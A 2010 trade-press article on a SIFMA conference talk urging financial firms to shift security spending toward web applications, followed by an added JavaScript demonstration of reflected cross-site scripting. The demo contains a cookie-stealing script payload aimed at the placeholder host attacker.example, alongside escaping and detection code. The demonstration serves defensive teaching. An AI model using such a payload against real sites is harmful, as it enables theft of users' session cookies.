SIFMA TECH 2010: Black Hats Outspending White Hats?

June 24, 2010
Tom Steinert-Threlkeld

Professional hackers are now motivated by the same compulsion as Wall Street: Making money.

And they are not just in the habit of out-thinking defenders of financial systems. They may be outspending them as well, an expert said Thursday at the Securities Industry and Financial Markets Association 2010 Financial Services Technology Expo in New York.

The popular image of a lone hacker attacking sites from a personal computer in a bedroom is out of date, said Stephanie Fohn, the chief executive of WhiteHat Security, in discussing "Proven Methods to Combat the Web Attacks That Plague the Financial Services Industry." Now, hackers work in worldwide collaboration, organized criminals in a digitally driven age, she said.

"The enemy is very well organized, very well funded and very focused on making money,'' Fohn said.

In fact, since 2004, organized crime has made more from the sale of data than it has from the sale of drugs, she said. In 2009, the take was an estimated $1 trillion, she said, citing a report to the U.S. Senate Commerce Committee.

Seventy percent of the largest 100 web sites have been compromised, she said, and theft of data by grabbing user information through Web sites persists. Heartland Payment Systems, which lost control of 130 million records, has paid out roughly $140 million in settlements and fines, as a result.

Fohn could not cite any specific examples of securities firms whose sites or customer records have been compromised through tactics such as injecting scripts into Web sites through forms, search windows and similar openings.
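To make the "script injected through a search window" tactic concrete, the following is an added example written for this page, not code from the talk or from WhiteHat Security. It renders a search results page two ways: once by concatenating the raw query into the HTML (the vulnerable pattern), once after HTML-escaping it for the text context it lands in. The attacker payload and the `escapeHtml`, `renderSearchVulnerable`, `renderSearchSafe` and `containsScriptTag` names are constructed for the demonstration.

```javascript
// Added example: reflected script injection via a search parameter,
// vulnerable rendering beside the escaped version. Not code from the
// original page; function names and the payload are constructed here.

// Escape the five characters that matter in an HTML text or attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable: the query string is dropped into the page unchanged, so any
// markup the attacker puts in the search box becomes part of the document.
function renderSearchVulnerable(query) {
  return '<h1>Results for: ' + query + '</h1>';
}

// Hardened: the query is escaped for the HTML text context it is inserted into,
// so a browser shows the payload as text instead of executing it.
function renderSearchSafe(query) {
  return '<h1>Results for: ' + escapeHtml(query) + '</h1>';
}

// Crude check of the kind a reviewer or a request/response filter might apply:
// does the rendered page carry a script tag the template never contained?
// This is a demonstration check, not a substitute for output encoding.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker input, shaped like a cookie-stealing XSS probe.
// The host name is a placeholder, not a real site.
const PAYLOAD =
  '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

console.log('vulnerable: ' + renderSearchVulnerable(PAYLOAD));
console.log('hardened:   ' + renderSearchSafe(PAYLOAD));
console.log('script tag in vulnerable output: ' +
  containsScriptTag(renderSearchVulnerable(PAYLOAD)));
console.log('script tag in hardened output:   ' +
  containsScriptTag(renderSearchSafe(PAYLOAD)));
```

The escaped output still shows the attacker's text verbatim to the user, which is the correct behaviour: the goal is to stop the browser from treating it as markup, not to hide it. Escaping is context-specific; the same query placed inside a `<script>` block or a URL attribute would need a different encoder.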

But she contended that firms need to switch spending from internal and network security into Web application security, since that's where attacks from organized hacking groups are concentrated.

She said only 18 percent of firms' technology security budgets were allocated to the threat posed by insecure Web applications, while 43 percent went to network and hosting security.

She also said a majority of firms, 70 percent, do not view Web application security as a strategic initiative. Most firms find their developers are too busy to respond to security issues and, budgetwise, are spending 10 times as much on firewalls and virtual private networks for employees to use as they do on Web site security.

Her prescription for protecting Web sites:

  • Inventory them. You can't secure sites you don't know you own.
  • Prioritize uses. Figure out which Web applications and what data are most at risk.
  • Define risk. Treat risk as the points where attackers can exploit the money or data transacted.
  • Assign a champion. Designate a top executive to own and drive data security and the numerous teams needed for investigation and defense.
  • Keep track of breaches and defenses. Accountability produces performance.
  • Don't wait for developers to take charge of security. Deploy shielding technologies to mitigate the risk of vulnerable Web applications, immediately.
  • Budget accordingly. Don't wait for the big breach to occur. Shift, if need be, spending from internal infrastructure to Web application security.